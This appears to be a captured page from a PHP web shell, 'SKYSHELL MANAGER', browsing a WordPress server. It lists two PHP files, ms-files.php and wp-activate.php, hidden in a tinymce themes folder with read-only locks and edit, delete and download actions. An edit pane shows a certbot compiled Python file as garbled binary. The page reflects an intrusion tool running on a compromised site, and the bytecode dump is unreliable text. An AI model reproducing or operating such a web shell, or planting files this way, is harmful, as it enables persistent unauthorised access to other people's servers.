📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: override_centos.cpython-312.pyc
� M/�e\ � �� � d Z ddlZddlmZ ddlmZ ddlmZ ddlmZ ddlm Z ddlm Z dd lmZ ej e� Z G d � de j � Z G d� d e j$ � Zy)zG Distribution specific override class for CentOS family (RHEL, Fedora) � N)�Any)�errors)�util)�apache_util)�configurator)�parser)� OsOptionsc � � � e Zd ZdZ eddddddddgdd gdd gddgd�� Zd� fd�Zd efd�Zd� fd�Z d� fd�Z dd�Z� xZS )�CentOSConfiguratorz1CentOS specific ApacheConfigurator override classz /etc/httpdz/etc/httpd/conf.dz*.confz/var/log/httpd� apachectl�httpdz-v�graceful�restart� configtest)�server_root� vhost_root�vhost_files� logs_root�ctl� apache_bin�version_cmd�restart_cmd�restart_cmd_alt�conftest_cmd�challenge_location�returnc �� �� t j � }|d j � dk( } t �| � � y# t j $ r |r| j � Y y� w xY w)a( Override config_test to mitigate configtest error in vanilla installation of mod_ssl in Fedora. The error is caused by non-existent self-signed certificates referenced by the configuration, that would be autogenerated during the first (re)start of httpd. r �fedoraN)r �get_os_info�lower�super�config_testr �MisconfigurationError�_try_restart_fedora)�self�os_infor � __class__s ��J/usr/lib/python3/dist-packages/certbot_apache/_internal/override_centos.pyr"